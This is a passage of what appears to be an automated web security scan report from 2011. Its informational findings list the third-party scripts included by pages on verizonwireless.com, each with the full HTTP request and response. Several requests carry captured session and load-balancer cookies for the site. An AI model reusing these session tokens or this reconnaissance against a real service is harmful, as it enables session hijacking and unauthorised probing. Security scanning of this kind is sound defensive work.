Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:16 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.57. http://www.verizonwireless.com/b2c/&hec=5&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.5447121190372854

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/&hec=5&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.5447121190372854

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/&hec=5&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.5447121190372854 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:20 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.58. http://www.verizonwireless.com/b2c/&hec=6&lid=//hp//p//100+Trade+In//Imp&hid=0.9608070966787636

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/&hec=6&lid=//hp//p//100+Trade+In//Imp&hid=0.9608070966787636

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/&hec=6&lid=//hp//p//100+Trade+In//Imp&hid=0.9608070966787636 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:24 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.59. http://www.verizonwireless.com/b2c/&hec=7&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.20118952100165188

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/&hec=7&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.20118952100165188

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/&hec=7&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.20118952100165188 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:28 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.60. http://www.verizonwireless.com/b2c/&hec=8&lid=//hp//p//Deals+Central//Imp&hid=0.22915508295409381

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/&hec=8&lid=//hp//p//Deals+Central//Imp&hid=0.22915508295409381

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/&hec=8&lid=//hp//p//Deals+Central//Imp&hid=0.22915508295409381 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:32 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.61. http://www.verizonwireless.com/b2c/&hec=9&lid=//hp//p//Back+To+School//Imp&hid=0.48359646485187113

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/&hec=9&lid=//hp//p//Back+To+School//Imp&hid=0.48359646485187113

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/&hec=9&lid=//hp//p//Back+To+School//Imp&hid=0.48359646485187113 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:36 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.62. http://www.verizonwireless.com/b2c/CoverageLocatorController

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/CoverageLocatorController

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/CoverageLocatorController HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:06 GMT
Pragma: no-cache
Content-Length: 12187
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


           
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.63. http://www.verizonwireless.com/b2c/aboutUs/affiliate/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/aboutUs/affiliate/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/aboutUs/affiliate/index.jsp HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:07 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 13457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


               <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.64. http://www.verizonwireless.com/b2c/deviceFinder/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/deviceFinder/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/deviceFinder/index.jsp HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:07 GMT
Pragma: no-cache
Content-Length: 6883
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                                                                                                                                                                <html
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
